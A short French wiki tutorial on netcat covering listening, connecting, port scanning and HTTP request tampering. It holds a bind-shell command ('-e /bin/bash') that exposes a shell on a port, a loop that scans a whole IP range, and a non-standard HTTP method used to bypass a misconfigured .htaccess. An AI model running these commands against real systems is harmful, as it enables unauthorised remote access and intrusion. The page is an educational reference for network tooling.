Introduction

Netcat est un outil permettant de communiquer en réseau que ce soit avec le protocole TCP ou UDP.

Écoute

netcat -l -p 1337 -e /bin/bash

-l : pour dire qu'on se met en mode écoute
-p : pour préciser le port sur lequel on écoute
-e : pour définir une action/commande a exécuter une fois la connexion effectuée.

Connexion

netcat 127.0.0.1 1337

127.0.0.1 : adresse ip sur laquelle on veut se connecter
1337: on précise le port de connexion
on peut ensuite utiliser notre shell a notre guise, on si on ne précise pas de commande, on peut discuter avec le serveur.

pnchbllz@Pnchbllz:~$ netcat 127.0.0.1 1337
ls #commande utilisée
bin
boot
dev
etc
home
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

Scans

Netcat permet aussi de scanner les ports sur une machine, pour cela on utilise la commande suivante:

netcat -vv -n -z 127.0.0.1 1337

-vv : verbose mode
-n : valeur numérique (ip)
-z : pour fermer netcat apres avoir afficher le status du port.

pnchbllz@Pnchbllz:~$ nc -vv -n -z 127.0.0.1 1337
[127.0.0.1] 1337 open
sent 0, rcvd 0

Pour scanner un range d'ip, j'utilise le script suivant:

for i in {1..254}; do netcat -vv -n -z xxx.xxx.xxx.$i 1337; done

Exploits

On peut enfin, se servir de netcat comme outil d'exploit, pour par exemple modifier les requêtes http faites a un serveur.

netcat htaccess.monsite.com 80
POUET /admin/ HTTP/1.1
host: htaccess.monsite.com

Cette commande permet par exemple de bypasser un .htaccess mal configuré par le sysadmin, qui refuse tout venant de POST et GET mais pas des autres request methods telles que OPTIONS, PUT etc..

wiki/netcat.txt · Dernière modification: 2018/04/23 19:13 (modification externe)
CC0 1.0 Universal
Powered by PHP Driven by DokuWiki Recent changes RSS feed Valid CSS Valid XHTML 1.0 Valid HTML5